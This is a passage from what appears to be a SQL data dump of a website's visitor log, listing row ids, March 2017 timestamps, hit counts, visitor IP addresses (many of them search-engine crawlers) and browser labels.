,'91.196.178.66','firefox'),(93993,1489755810,1,1,0,0,'46.200.244.55','chrome'),(93994,1489756174,1,1,0,0,'164.132.161.72','other'),(93995,1489756499,1,0,1,0,'66.249.76.108',''),(93996,1489756512,1,1,0,0,'51.255.65.39','other'),(93997,1489756644,1,1,0,0,'40.77.167.69','other'),(93998,1489756949,1,1,0,0,'91.196.177.46','firefox'),(93999,1489757135,1,0,1,0,'66.249.66.177',''),(94000,1489757195,1,1,0,0,'164.132.161.69','other'),(94001,1489757476,4,4,0,0,'91.196.178.70','firefox'),(94002,1489757533,1,1,0,0,'51.15.10.29','chrome'),(94003,1489757832,1,1,0,0,'8.29.198.26','other'),(94004,1489758438,1,1,0,0,'91.196.178.70','firefox'),(94005,1489758478,1,1,0,0,'91.196.178.129','firefox'),(94006,1489758647,1,1,0,0,'180.76.15.25','other'),(94007,1489759184,1,1,0,0,'178.95.233.159','chrome'),(94008,1489759302,1,1,0,0,'37.53.228.45','firefox'),(94009,1489759587,1,1,0,0,'164.132.161.15','other'),(94010,1489759594,1,1,0,0,'91.196.178.163','chrome'),(94011,1489759984,1,1,0,0,'163.172.64.236','other'),(94012,1489760415,1,0,1,0,'66.249.76.108',''),(94013,1489760541,1,1,0,0,'95.132.17.159','chrome'),(94014,1489761186,1,0,1,0,'66.249.76.28',''),(94015,1489761412,1,0,1,0,'66.249.76.108',''),(94016,1489761928,1,1,0,0,'51.255.65.26','other'),(94017,1489761990,1,1,0,0,'91.196.178.165','chrome'),(94018,1489762127,1,1,0,0,'91.196.178.37','chrome'),(94019,1489762368,1,1,0,0,'164.132.161.45','other'),(94020,1489762904,1,0,1,0,'66.249.76.28',''),(94021,1489762999,1,1,0,0,'163.172.64.249','other'),(94022,1489763001,2,0,2,0,'66.249.76.30',''),(94023,1489764104,1,1,0,0,'40.77.167.31','other'),(94024,1489764268,1,1,0,0,'180.76.15.9','other'),(94025,1489764430,1,0,1,0,'66.249.66.81',''),(94026,1489764829,1,1,0,0,'164.132.161.63','other'),(94027,1489765093,1,1,0,0,'130.193.51.45','other'),(94028,1489765708,1,0,1,0,'66.249.76.107',''),(94029,1489765807,1,0,1,0,'66.249.76.109',''),(94030,1489766206,1,1,0,0,'40.77.167.69','other'),(94031,1489767213,1,0,1,0,'66.249.64.59',''),(94032,1489767307,1,0,1,0,'66.249.64.133',''),(94033,1489767817,1,1,0,0,'164.132.161.42','other'),(94034,1489768192,1,1,0,0,'66.249.64.59','chrome'),(94035,1489768656,1,1,0,0,'8.29.198.26','other'),(94036,1489768695,1,1,0,0,'180.76.15.139','other'),(94037,1489768888,1,1,0,0,'82.145.221.165','other'),(94038,1489769043,1,1,0,0,'91.196.178.163','chrome'),(94039,1489769216,1,0,1,0,'66.249.64.27',''),(94040,1489769514,1,0,1,0,'66.249.64.59',''),(94041,1489770110,1,0,1,0,'66.249.64.143',''),(94042,1489770178,1,1,0,0,'178.92.75.131','firefox'),(94043,1489770504,1,1,0,0,'82.145.222.113','other'),(94044,1489770562,1,0,1,0,'66.249.64.179',''),(94045,1489770782,1,0,1,0,'66.249.64.187',''),(94046,1489771130,1,0,1,0,'66.249.64.21',''),(94047,1489771355,1,0,1,0,'66.249.64.143',''),(94048,1489771511,1,1,0,0,'51.255.65.51','other'),(94049,1489771840,1,0,1,0,'66.249.64.27',''),(94050,1489773362,1,1,0,0,'51.255.65.93','other'),(94051,1489774550,1,1,0,0,'66.102.9.38','chrome'),(94052,1489774709,1,0,1,0,'66.249.64.187',''),(94053,1489776285,2,0,2,0,'66.249.64.179',''),(94054,1489776353,1,1,0,0,'178.92.75.131','firefox'),(94055,1489776768,1,0,1,0,'40.77.167.31',''),(94056,1489776954,1,1,0,0,'40.77.167.31','other'),(94057,1489777321,2,1,1,0,'66.249.64.179',''),(94058,1489778033,5,5,0,0,'88.198.23.179','other'),(94059,1489778077,1,1,0,0,'164.132.161.65','other'),(94060,1489778120,1,0,1,0,'66.249.64.187',''),(94061,1489778932,1,0,1,0,'66.249.64.57',''),(94062,1489779064,3,0,3,0,'66.249.64.187',''),(94063,1489779112,1,0,1,0,'66.249.64.183',''),(94064,1489779169,2,2,0,0,'207.46.13.122','other'),(94065,1489779454,1,1,0,0,'51.255.65.68','other'),(94066,1489779462,1,1,0,0,'8.29.198.27','other'),(94067,1489779920,1,1,0,0,'163.172.64.232','other'),(94068,1489780021,1,0,1,0,'66.249.64.183',''),(94069,1489780084,1,0,1,0,'66.249.64.179',''),(94070,1489780099,1,1,0,0,'91.196.178.167','chrome'),(94071,1489780127,2,2,0,0,'95.108.179.22','other'),(94072,1489780153,1,1,0,0,'141.8.142.175','other'),(94073,1489780160,1,1,0,0,'141.8.183.25','other'),(94074,1489780193,1,1,0,0,'91.196.178.71','chrome'),(94075,1489780847,1,1,0,0,'51.255.65.34','other'),(94076,1489781072,1,1,0,0,'164.132.161.6','other'),(94077,1489781296,1,1,0,0,'163.172.64.222','other'),(94078,1489781724,1,1,0,0,'164.132.161.9','other'),(94079,1489782426,1,1,0,0,'51.255.65.78','other'),(94080,1489782897,1,1,0,0,'178.92.75.131','firefox'),(94081,1489782924,1,1,0,0,'109.236.91.79','chrome'),(94082,1489782958,1,1,0,0,'40.77.167.31','other'),(94083,1489783200,1,1,0,0,'163.172.64.217','other'),(94084,1489783870,1,0,1,0,'40.77.167.31',''),(94085,1489784308,1,1,0,0,'217.69.133.221','other'),(94086,1489784723,1,1,0,0,'46.219.242.180','chrome'),(94087,1489786139,1,0,1,0,'40.77.167.69',''),(94088,1489786155,1,1,0,0,'46.242.55.252','msie'),(94089,1489786523,1,1,0,0,'46.219.242.180','chrome'),(94090,1489786530,1,1,0,0,'51.255.65.68','other'),(94091,1489787329,1,1,0,0,'66.249.64.59','chrome'),(94092,1489787382,1,1,0,0,'207.46.13.122','other'),(94093,1489787397,1,1,0,0,'51.255.65.52','other'),(94094,1489787803,1,1,0,0,'163.172.64.227','other'),(94095,1489787998,1,1,0,0,'207.46.13.139','other'),(94096,1489788089,1,1,0,0,'141.8.142.175','other'),(94097,1489788324,1,1,0,0,'46.219.242.180','chrome'),(94098,1489788401,1,1,0,0,'163.172.64.179','other'),(94099,1489789834,1,1,0,0,'95.108.179.22','other'),(94100,1489790112,1,0,1,0,'66.249.64.61',''),(94101,1489790123,1,1,0,0,'46.219.242.180','chrome'),(94102,1489790130,1,1,0,0,'66.249.64.57','chrome'),(94103,1489790221,1,1,0,0,'40.77.167.69','other'),(94104,1489790279,1,1,0,0,'8.29.198.25','other'),(94105,1489790434,1,1,0,0,'207.46.13.122','other'),(94106,1489790484,1,0,1,0,'66.249.64.187',''),(94107,1489791016,1,1,0,0,'51.255.65.45','other'),(94108,1489791390,1,1,0,0,'37.55.59.6','chrome'),(94109,1489791923,1,1,0,0,'46.219.242.180','chrome'),(94110,1489792040,8,8,0,0,'217.80.222.6','other'),(94111,1489792282,1,1,0,0,'164.132.161.77','other'),(94112,1489792717,1,1,0,0,'40.77.167.69','other'),(94113,1489793723,1,1,0,0,'46.219.242.180','chrome'),(94114,1489793977,2,0,2,0,'66.249.64.187',''),(94115,1489794062,1,1,0,0,'51.255.65.38','other'),(94116,1489794146,1,0,1,0,'66.249.64.183',''),(94117,1489794535,1,1,0,0,'37.55.59.6','chrome'),(94118,1489795039,1,1,0,0,'176.15.89.38','msie'),(94119,1489795075,1,1,0,0,'46.48.13.161','chrome'),(94120,1489795156,1,0,1,0,'66.249.64.57',''),(94121,1489795523,1,1,0,0,'46.219.242.180','chrome'),(94122,1489795850,1,1,0,0,'207.46.13.139','other'),(94123,1489797324,1,1,0,0,'46.219.242.180','chrome'),(94124,1489797995,1,1,0,0,'66.102.9.27','chrome'),(94125,1489798048,1,0,1,0,'66.249.64.57',''),(94126,1489799123,1,1,0,0,'46.219.242.180','chrome'),(94127,1489800451,1,1,0,0,'46.242.30.55','msie'),(94128,1489800924,1,1,0,0,'46.219.242.180','chrome'),(94129,1489801085,1,1,0,0,'8.29.198.25','other'),(94130,1489801256,1,1,0,0,'164.132.161.81','other'),(94131,1489801387,2,2,0,0,'83.170.203.142','chrome'),(94132,1489801445,1,1,0,0,'163.172.69.178','other'),(94133,1489802133,1,1,0,0,'164.132.161.80','other'),(94134,1489802201,1,1,0,0,'51.255.65.73','other'),(94135,1489802723,1,1,0,0,'46.219.242.180','chrome'),(94136,1489802823,1,0,1,0,'66.249.64.57',''),(94137,1489804523,1,1,0,0,'46.219.242.180','chrome'),(94138,1489804842,1,1,0,0,'178.154.189.37','other'),(94139,1489804887,1,0,1,0,'66.249.64.179',''),(94140,1489804910,1,1,0,0,'52.86.176.3','other'),(94141,1489806326,1,1,0,0,'46.219.242.180','chrome'),(94142,1489806511,1,0,1,0,'66.249.64.187',''),(94143,1489807140,1,1,0,0,'128.75.89.206','msie'),(94144,1489808123,1,1,0,0,'46.219.242.180','chrome'),(94145,1489808464,7,7,0,0,'195.128.17.206','other'),(94146,1489808498,1,1,0,0,'46.48.13.161','chrome'),(94147,1489808901,1,1,0,0,'164.132.161.34','other'),(94148,1489809011,1,0,1,0,'66.249.64.183',''),(94149,1489809498,1,1,0,0,'180.76.15.147','other'),(94150,1489809924,1,1,0,0,'46.219.242.180','chrome'),(94151,1489810055,1,1,0,0,'82.145.221.41','other'),(94152,1489810658,1,1,0,0,'52.86.176.3','other'),(94153,1489810938,1,0,1,0,'66.249.64.179',''),(94154,1489811002,1,1,0,0,'54.244.49.242','msie'),(94155,1489811203,1,1,0,0,'163.172.64.199','other'),(94156,1489811724,1,1,0,0,'46.219.242.180','chrome'),(94157,1489811898,1,1,0,0,'8.29.198.25','other'),(94158,1489812022,1,0,1,0,'66.249.64.183',''),(94159,1489812579,2,0,2,0,'66.249.64.179',''),(94160,1489813157,1,1,0,0,'66.249.64.187','chrome'),(94161,1489813283,1,0,1,0,'66.249.64.183',''),(94162,1489813521,1,0,1,0,'66.249.64.61',''),(94163,1489813523,1,1,0,0,'46.219.242.180','chrome'),(94164,1489814565,1,1,0,0,'95.108.179.22','other'),(94165,1489814808,1,0,1,0,'66.249.64.61',''),(94166,1489815241,1,1,0,0,'51.255.65.21','other'),(94167,1489815324,1,1,0,0,'46.219.242.180','chrome'),(94168,1489816461,1,1,0,0,'141.8.132.2','other'),(94169,1489816494,1,1,0,0,'51.255.65.29','other'),(94170,1489817124,1,1,0,0,'46.219.242.180','chrome'),(94171,1489817377,1,0,1,0,'66.249.64.61',''),(94172,1489817929,1,1,0,0,'141.8.142.175','other'),(94173,1489818126,1,1,0,0,'95.28.199.220','msie'),(94174,1489818365,1,1,0,0,'141.8.183.25','other'),(94175,1489819203,1,1,0,0,'51.255.65.5','other'),(94176,1489819289,2,2,0,0,'95.213.141.126','opera'),(94177,1489819581,1,1,0,0,'91.196.178.40','chrome'),(94178,1489819719,1,1,0,0,'164.132.161.6','other'),(94179,1489820364,1,1,0,0,'51.255.65.30','other'),(94180,1489820579,1,1,0,0,'109.173.59.141','msie'),(94181,1489820611,1,0,1,0,'66.249.64.183',''),(94182,1489821457,2,1,1,0,'66.249.64.183',''),(94183,1489821569,2,1,1,0,'66.249.64.61',''),(94184,1489821740,1,1,0,0,'66.249.93.157','chrome'),(94185,1489822711,1,1,0,0,'8.29.198.25','other'),(94186,1489823150,1,0,1,0,'66.249.64.57',''),(94187,1489823163,2,2,0,0,'37.73.134.198','chrome'),(94188,1489823314,1,1,0,0,'66.249.64.179','chrome'),(94189,1489825960,1,1,0,0,'178.92.75.131','firefox'),(94190,1489826273,1,1,0,0,'66.249.64.183','chrome'),(94191,1489826490,1,1,0,0,'66.249.64.59','chrome'),(94192,1489827270,1,1,0,0,'51.255.65.4','other'),(94193,1489827308,1,1,0,0,'163.172.68.127','other'),(94194,1489827359,1,1,0,0,'91.196.178.66','chrome'),(94195,1489827371,1,1,0,0,'141.8.142.67','other'),(94196,1489827624,29,29,0,0,'144.76.8.231','other'),(94197,1489828088,1,0,1,0,'66.249.64.183',''),(94198,1489828525,1,1,0,0,'46.63.125.4','firefox'),(94199,1489828606,1,1,0,0,'91.209.11.236','other'),(94200,1489829065,1,1,0,0,'193.194.127.217','firefox'),(94201,1489829610,1,1,0,0,'141.8.142.175','other'),(94202,1489829831,1,1,0,0,'79.137.150.136','chrome'),(94203,1489829843,1,1,0,0,'130.180.220.130','firefox'),(94204,1489830543,1,1,0,0,'95.108.179.22','other'),(94205,1489830547,1,1,0,0,'141.8.142.67','other'),(94206,1489830799,1,1,0,0,'66.249.64.179','chrome'),(94207,1489831050,1,1,0,0,'164.132.161.33','other'),(94208,1489831213,1,1,0,0,'164.132.161.87','other'),(94209,1489831468,1,0,1,0,'66.249.64.57',''),(94210,1489832627,1,1,0,0,'164.132.161.77','other'),(94211,1489833183,1,0,1,0,'66.249.64.61',''),(94212,1489833518,1,1,0,0,'8.29.198.25','other'),(94213,1489833670,1,0,1,0,'66.249.64.59',''),(94214,1489835477,1,1,0,0,'66.249.64.57','chrome'),(94215,1489836241,1,1,0,0,'207.46.13.157','other'),(94216,1489836695,1,1,0,0,'66.249.64.59','chrome'),(94217,1489836822,2,2,0,0,'91.196.178.167','firefox'),(94218,1489837585,1,0,1,0,'66.249.64.187',''),(94219,1489838215,1,0,1,0,'66.249.64.179',''),(94220,1489839336,1,0,1,0,'66.249.64.61',''),(94221,1489839938,1,0,1,0,'66.249.64.183',''),(94222,1489840076,1,1,0,0,'163.172.64.236','other'),(94223,1489840277,1,1,0,0,'217.69.133.220','other'),(94224,1489840563,1,1,0,0,'91.209.11.236','other'),(94225,1489841059,2,0,2,0,'66.249.64.179',''),(94226,1489841339,1,1,0,0,'109.63.138.55','msie'),(94227,1489842019,1,1,0,0,'91.196.178.33','firefox'),(94228,1489842161,1,1,0,0,'141.8.142.155','other'),(94229,1489842215,1,1,0,0,'157.55.39.121','other'),(94230,1489843124,1,1,0,0,'141.8.183.25','other'),(94231,1489843322,1,0,1,0,'66.249.64.179',''),(94232,1489844324,1,1,0,0,'8.29.198.25','other'),(94233,1489844644,2,2,0,0,'91.196.178.99','chrome'),(94234,1489845136,1,1,0,0,'130.193.51.74','other'),(94235,1489845163,1,1,0,0,'66.249.64.179','chrome'),(94236,1489845558,1,1,0,0,'163.172.64.244','other'),(94237,1489845926,1,1,0,0,'91.196.178.33','firefox'),(94238,1489846441,1,1,0,0,'141.8.142.67','other'),(94239,1489846442,1,1,0,0,'141.8.142.175','other'),(94240,1489846444,3,3,0,0,'130.193.50.6','other'),(94241,1489846508,2,2,0,0,'93.158.152.51','other'),(94242,1489847047,1,1,0,0,'141.8.183.19','other'),(94243,1489847123,1,1,0,0,'141.8.142.58','other'),(94244,1489847126,1,1,0,0,'141.8.142.61','other'),(94245,1489847130,1,1,0,0,'95.108.179.18','other'),(94246,1489847133,1,1,0,0,'141.8.132.10','other'),(94247,1489847137,1,1,0,0,'130.193.51.45','other'),(94248,1489847141,1,1,0,0,'130.193.51.14','other'),(94249,1489847148,1,1,0,0,'141.8.142.85','other'),(94250,1489847194,1,1,0,0,'141.8.142.206','other'),(94251,1489847680,1,0,1,0,'66.249.64.183',''),(94252,1489848188,1,1,0,0,'207.46.13.157','other'),(94253,1489848876,1,0,1,0,'66.249.64.59',''),(94254,1489850338,1,1,0,0,'66.249.64.57','chrome'),(94255,1489851080,1,1,0,0,'164.132.161.73','other'),(94256,1489851403,1,1,0,0,'66.249.64.179','chrome'),(94257,1489851468,10,10,0,0,'69.58.178.56','other'),(94258,1489851749,1,0,1,0,'66.249.64.57',''),(94259,1489851872,1,1,0,0,'217.69.133.222','other'),(94260,1489851980,1,1,0,0,'95.28.199.220','msie'),(94261,1489852559,1,0,1,0,'66.249.64.187',''),(94262,1489853200,1,1,0,0,'164.132.161.78','other'),(94263,1489853456,1,1,0,0,'46.200.116.47','chrome'),(94264,1489853898,1,0,1,0,'66.249.64.179',''),(94265,1489854136,1,1,0,0,'164.132.161.50','other'),(94266,1489854362,1,1,0,0,'95.108.179.22','other'),(94267,1489854520,1,1,0,0,'164.132.161.43','other'),(94268,1489854698,1,1,0,0,'51.255.65.8','other'),(94269,1489854799,1,1,0,0,'163.172.71.29','other'),(94270,1489855141,1,1,0,0,'8.29.198.26','other'),(94271,1489855215,4,4,0,0,'5.9.111.70','other'),(94272,1489857179,1,1,0,0,'207.46.13.157','other'),(94273,1489857296,1,0,1,0,'66.249.64.59',''),(94274,1489857747,1,1,0,0,'164.132.161.77','other'),(94275,1489857921,1,0,1,0,'66.249.64.179',''),(94276,1489858287,1,1,0,0,'51.255.65.45','other'),(94277,1489858781,1,1,0,0,'46.242.121.87','msie'),(94278,1489858809,1,1,0,0,'163.172.64.231','other'),(94279,1489859102,1,1,0,0,'46.200.113.215','firefox'),(94280,1489860484,1,1,0,0,'164.132.161.80','other'),(94281,1489861016,1,1,0,0,'95.108.179.22','other'),(94282,1489861416,1,1,0,0,'157.55.39.159','other'),(94283,1489861523,1,1,0,0,'176.193.105.179','msie'),(94284,1489862086,1,1,0,0,'178.140.84.249','chrome'),(94285,1489862510,1,1,0,0,'178.92.75.131','firefox'),(94286,1489862881,1,1,0,0,'66.249.64.179','chrome'),(94287,1489863658,1,1,0,0,'163.172.68.136','other'),(94288,1489864053,1,1,0,0,'51.255.65.79','other'),(94289,1489864289,1,1,0,0,'51.255.65.21','other'),(94290,1489864295,1,1,0,0,'164.132.161.17','other'),(94291,1489864424,2,2,0,0,'91.196.178.167','chrome'),(94292,1489864849,2,2,0,0,'66.249.64.179','chrome'),(94293,1489865459,8,8,0,0,'108.12.27.97','other'),(94294,1489865791,1,0,1,0,'66.249.64.61',''),(94295,1489865966,1,1,0,0,'8.29.198.25','other'),(94296,1489866093,2,2,0,0,'91.196.178.99','chrome'),(94297,1489866217,1,1,0,0,'51.255.65.52','other'),(94298,1489866414,1,1,0,0,'91.196.178.71','firefox'),(94299,1489866949,1,1,0,0,'66.249.64.187','chrome'),(94300,1489867601,1,1,0,0,'51.255.65.95','other'),(94301,1489867738,1,1,0,0,'128.75.89.206','msie'),(94302,1489867837,1,0,1,0,'66.249.64.183',''),(94303,1489868230,1,1,0,0,'130.193.50.38','other'),(94304,1489868360,1,1,0,0,'130.193.51.74','other'),(94305,1489868858,1,0,1,0,'66.249.64.179',''),(94306,1489869238,2,0,2,0,'66.249.64.183',''),(94307,1489869798,1,1,0,0,'141.8.142.175','other'),(94308,1489870799,1,1,0,0,'163.172.64.182','other'),(94309,1489871163,1,1,0,0,'164.132.161.29','other'),(94310,1489871372,1,1,0,0,'164.132.161.73','other'),(94311,1489871990,1,1,0,0,'51.255.65.3','other'),(94312,1489872072,1,1,0,0,'164.132.161.12','other'),(94313,1489872333,40,40,0,0,'95.108.179.22','other'),(94314,1489872527,1,1,0,0,'141.8.142.175','other'),(94315,1489872974,1,0,1,0,'66.249.64.179',''),(94316,1489874755,3,3,0,0,'95.108.179.22','other'),(94317,1489874759,1,1,0,0,'51.255.65.58','other'),(94318,1489874795,1,1,0,0,'141.8.142.175','other'),(94319,1489875185,1,0,1,0,'66.249.64.61',''),(94320,1489875576,1,1,0,0,'51.255.65.61','other'),(94321,1489875980,1,1,0,0,'176.195.120.178','msie'),(94322,1489876038,1,0,1,0,'66.249.64.183',''),(94323,1489876063,1,1,0,0,'46.73.239.194','msie'),(94324,1489876203,1,1,0,0,'164.132.161.75','other'),(94325,1489876530,2,0,2,0,'66.249.64.179',''),(94326,1489876787,1,1,0,0,'8.29.198.26','other'),(94327,1489876849,1,1,0,0,'164.132.161.47','other'),(94328,1489877155,1,1,0,0,'51.255.65.81','other'),(94329,1489877647,1,1,0,0,'164.132.161.4','other'),(94330,1489877908,1,1,0,0,'51.255.65.46','other'),(94331,1489878058,1,1,0,0,'37.144.52.74','msie'),(94332,1489878336,1,1,0,0,'163.172.68.132','other'),(94333,1489879446,1,1,0,0,'164.132.161.9','other'),(94334,1489879477,1,1,0,0,'180.76.15.150','other'),(94335,1489879722,1,0,1,0,'66.249.64.57',''),(94336,1489879973,1,1,0,0,'51.255.65.97','other'),(94337,1489880624,1,0,1,0,'66.249.64.61',''),(94338,1489880993,1,1,0,0,'51.255.65.16','other'),(94339,1489881033,1,1,0,0,'141.8.142.175','other'),(94340,1489881232,1,1,0,0,'163.172.64.216','other'),(94341,1489883898,1,1,0,0,'164.132.161.64','other'),(94342,1489885508,1,1,0,0,'164.132.161.44','other'),(94343,1489886027,1,1,0,0,'164.132.161.12','other'),(94344,1489886109,1,1,0,0,'164.132.161.33','other'),(94345,1489886355,1,1,0,0,'141.8.142.175','other'),(94346,1489887574,1,1,0,0,'164.132.161.41','other'),(94347,1489887603,1,1,0,0,'8.29.198.27','other'),(94348,1489888614,1,1,0,0,'164.132.161.36','other'),(94349,1489889160,1,1,0,0,'51.255.65.48','other'),(94350,1489889556,1,1,0,0,'93.80.150.33','msie'),(94351,1489890005,1,1,0,0,'164.132.161.35','other'),(94352,1489891249,1,1,0,0,'164.132.161.75','other'),(94353,1489891832,1,0,1,0,'66.249.64.57',''),(94354,1489891985,1,0,1,0,'66.249.64.187',''),(94355,1489894133,1,1,0,0,'164.132.161.6','other'),(94356,1489894576,1,1,0,0,'164.132.161.26','other'),(94357,1489894960,1,1,0,0,'51.255.65.33','other'),(94358,1489895388,1,1,0,0,'85.30.248.79','chrome'),(94359,1489895659,1,1,0,0,'46.188.71.199','chrome'),(94360,1489896413,1,1,0,0,'130.193.51.19','other'),(94361,1489896796,1,1,0,0,'176.195.120.56','msie'),(94362,1489896840,1,1,0,0,'195.128.17.206','other'),(94363,1489897145,1,1,0,0,'51.255.65.97','other'),(94364,1489897268,1,1,0,0,'91.196.178.99','chrome'),(94365,1489897437,1,1,0,0,'180.76.15.160','other'),(94366,1489897537,1,0,1,0,'66.249.64.187',''),(94367,1489898204,1,1,0,0,'51.255.65.67','other'),(94368,1489898380,1,1,0,0,'164.132.161.46','other'),(94369,1489898424,1,1,0,0,'8.29.198.27','other'),(94370,1489899782,1,1,0,0,'95.108.179.22','other'),(94371,1489899853,1,0,1,0,'66.249.64.57',''),(94372,1489900245,1,1,0,0,'82.145.220.236','other'),(94373,1489900281,1,0,1,0,'66.249.64.179',''),(94374,1489900428,1,0,1,0,'66.249.64.183',''),(94375,1489901026,1,1,0,0,'51.255.65.5','other'),(94376,1489902201,1,1,0,0,'141.8.142.175','other'),(94377,1489903109,1,0,1,0,'66.249.64.179',''),(94378,1489903844,1,1,0,0,'46.73.212.52','msie'),(94379,1489903865,1,1,0,0,'163.172.64.234','other'),(94380,1489904048,1,1,0,0,'164.132.161.77','other'),(94381,1489905079,1,1,0,0,'164.132.161.30','other'),(94382,1489905518,1,1,0,0,'66.249.93.156','chrome'),(94383,1489907557,1,1,0,0,'164.132.161.73','other'),(94384,1489909079,1,1,0,0,'66.249.64.187','chrome'),(94385,1489909232,1,0,1,0,'66.249.64.57',''),(94386,1489909243,1,1,0,0,'8.29.198.27','other'),(94387,1489909550,1,1,0,0,'51.255.65.93','other'),(94388,1489909658,1,1,0,0,'188.32.103.121','msie'),(94389,1489909766,1,1,0,0,'164.132.161.47','other'),(94390,1489910420,1,0,1,0,'66.249.64.179',''),(94391,1489910440,1,1,0,0,'51.255.65.17','other'),(94392,1489911187,1,1,0,0,'130.180.217.2','firefox'),(94393,1489911460,1,1,0,0,'95.108.179.22','other'),(94394,1489911612,1,1,0,0,'178.92.75.131','firefox'),(94395,1489911948,1,1,0,0,'51.255.65.53','other'),(94396,1489912539,1,1,0,0,'95.28.39.60','msie'),(94397,1489912859,1,1,0,0,'46.219.242.180','chrome'),(94398,1489912862,1,0,1,0,'68.180.229.99',''),(94399,1489912947,1,1,0,0,'176.195.98.106','msie'),(94400,1489913319,2,0,2,0,'66.249.64.61',''),(94401,1489913368,1,1,0,0,'91.196.178.37','chrome'),(94402,1489913390,1,1,0,0,'130.180.218.247','chrome'),(94403,1489913567,1,0,1,0,'66.249.64.59',''),(94404,1489913913,2,0,2,0,'66.249.64.57',''),(94405,1489914603,2,0,2,0,'66.249.64.61',''),(94406,1489914656,1,1,0,0,'46.219.242.180','chrome'),(94407,1489914922,4,0,4,0,'66.249.64.57',''),(94408,1489915121,2,0,2,0,'66.249.64.59',''),(94409,1489915803,1,0,1,0,'66.249.64.61',''),(94410,1489916400,1,1,0,0,'51.255.65.42','other'),(94411,1489916590,1,1,0,0,'163.172.64.216','other'),(94412,1489917540,1,1,0,0,'163.172.64.238','other'),(94413,1489918185,1,1,0,0,'66.249.64.59','chrome'),(94414,1489918263,1,1,0,0,'51.255.65.35','other'),(94415,1489918844,1,1,0,0,'164.132.161.2','other'),(94416,1489919147,1,1,0,0,'164.132.161.87','other'),(94417,1489919826,1,1,0,0,'164.132.161.45','other'),(94418,1489920059,1,1,0,0,'164.132.161.14','other'),(94419,1489920072,1,1,0,0,'8.29.198.27','other'),(94420,1489920857,1,0,1,0,'66.249.64.183',''),(94421,1489920922,1,1,0,0,'164.132.161.49','other'),(94422,1489922024,2,0,2,0,'66.249.64.183',''),(94423,1489922901,1,1,0,0,'207.46.13.172','other'),(94424,1489923294,1,1,0,0,'91.196.178.70','chrome'),(94425,1489923339,1,1,0,0,'91.196.178.99','other'),(94426,1489923341,1,0,1,0,'66.249.64.61',''),(94427,1489923537,1,1,0,0,'195.114.136.104','chrome'),(94428,1489923816,1,0,1,0,'66.249.64.183',''),(94429,1489924805,1,0,1,0,'66.249.64.61',''),(94430,1489924955,1,0,1,0,'66.249.64.187',''),(94431,1489926229,1,1,0,0,'91.209.11.236','other'),(94432,1489927058,1,1,0,0,'40.77.167.94','other'),(94433,1489927350,1,1,0,0,'51.255.65.25','other'),(94434,1489927603,1,1,0,0,'66.249.64.57','chrome'),(94435,1489928730,3,3,0,0,'91.209.51.22','other'),(94436,1489928821,1,1,0,0,'95.108.179.22','other'),(94437,1489929507,1,1,0,0,'164.132.161.44','other'),(94438,1489930721,1,0,1,0,'66.249.64.183',''),(94439,1489930893,1,1,0,0,'8.29.198.25','other'),(94440,1489931274,1,1,0,0,'157.55.39.169','other'),(94441,1489931810,1,1,0,0,'51.255.65.39','other'),(94442,1489932199,1,1,0,0,'95.108.179.22','other'),(94443,1489932759,1,0,1,0,'66.249.64.179',''),(94444,1489933222,1,1,0,0,'51.255.65.82','other'),(94445,1489933267,1,1,0,0,'95.108.179.22','other'),(94446,1489934019,1,1,0,0,'163.172.64.254','other'),(94447,1489934568,1,1,0,0,'91.213.209.64','chrome'),(94448,1489934851,1,0,1,0,'66.249.64.59',''),(94449,1489935177,1,1,0,0,'95.108.179.22','other'),(94450,1489935312,1,1,0,0,'51.255.65.62','other'),(94451,1489936493,1,1,0,0,'95.132.35.52','chrome'),(94452,1489936607,1,1,0,0,'164.132.161.78','other'),(94453,1489937174,1,1,0,0,'185.26.180.99','other'),(94454,1489937417,1,1,0,0,'95.132.23.193','chrome'),(94455,1489938192,1,1,0,0,'141.0.12.152','other'),(94456,1489938507,1,1,0,0,'91.196.178.71','chrome'),(94457,1489938693,1,1,0,0,'51.255.65.59','other'),(94458,1489939274,1,0,1,0,'40.77.167.116',''),(94459,1489939531,1,0,1,0,'66.249.64.187',''),(94460,1489939567,1,1,0,0,'91.196.178.131','chrome'),(94461,1489939744,1,1,0,0,'37.144.52.74','msie'),(94462,1489939783,1,1,0,0,'180.76.15.149','other'),(94463,1489939980,1,1,0,0,'163.172.64.191','other'),(94464,1489940358,1,1,0,0,'91.196.178.104','chrome'),(94465,1489941712,1,1,0,0,'8.29.198.26','other'),(94466,1489942845,1,1,0,0,'5.9.156.74','other'),(94467,1489943290,1,0,1,0,'66.249.64.21',''),(94468,1489943502,1,0,1,0,'66.249.64.179',''),(94469,1489943871,1,1,0,0,'95.108.179.22','other'),(94470,1489944249,1,1,0,0,'51.255.65.86','other'),(94471,1489944366,1,1,0,0,'180.76.15.153','other'),(94472,1489944563,1,0,1,0,'66.249.64.179',''),(94473,1489945059,23,23,0,0,'62.210.101.96','other'),(94474,1489945106,1,1,0,0,'164.132.161.12','other'),(94475,1489945199,1,1,0,0,'164.132.161.10','other'),(94476,1489946541,1,1,0,0,'93.158.152.51','other'),(94477,1489946946,1,0,1,0,'66.249.64.133',''),(94478,1489947574,1,0,1,0,'66.249.64.24',''),(94479,1489949498,2,2,0,0,'66.249.64.179','chrome'),(94480,1489949982,1,1,0,0,'164.132.161.41','other'),(94481,1489950346,1,0,1,0,'66.249.64.187',''),(94482,1489950517,1,1,0,0,'66.249.64.27','chrome'),(94483,1489951431,1,1,0,0,'163.172.64.186','other'),(94484,1489951714,1,1,0,0,'66.249.64.179','chrome'),(94485,1489952539,1,1,0,0,'8.29.198.26','other'),(94486,1489952766,1,1,0,0,'91.209.11.236','other'),(94487,1489952995,1,1,0,0,'164.132.161.72','other'),(94488,1489953070,1,0,1,0,'66.249.64.133',''),(94489,1489953149,1,0,1,0,'66.249.64.138',''),(94490,1489953420,2,2,0,0,'95.108.179.22','other'),(94491,1489953477,1,1,0,0,'93.74.16.22','other'),(94492,1489954071,1,1,0,0,'66.249.64.187','chrome'),(94493,1489954555,1,1,0,0,'51.255.65.70','other'),(94494,1489955286,1,0,1,0,'66.249.64.61',''),(94495,1489955401,1,0,1,0,'66.249.64.24',''),(94496,1489955915,1,1,0,0,'37.204.82.163','chrome'),(94497,1489956125,1,1,0,0,'164.132.161.63','other'),(94498,1489956500,1,1,0,0,'66.249.64.183','chrome'),(94499,1489956845,1,0,1,0,'66.249.64.21',''),(94500,1489957091,1,1,0,0,'164.132.161.21','other'),(94501,1489958512,1,0,1,0,'66.249.64.143',''),(94502,1489958601,1,0,1,0,'66.249.64.138',''),(94503,1489959612,1,1,0,0,'164.132.161.39','other'),(94504,1489959638,1,1,0,0,'40.77.167.82','other'),(94505,1489960019,1,1,0,0,'194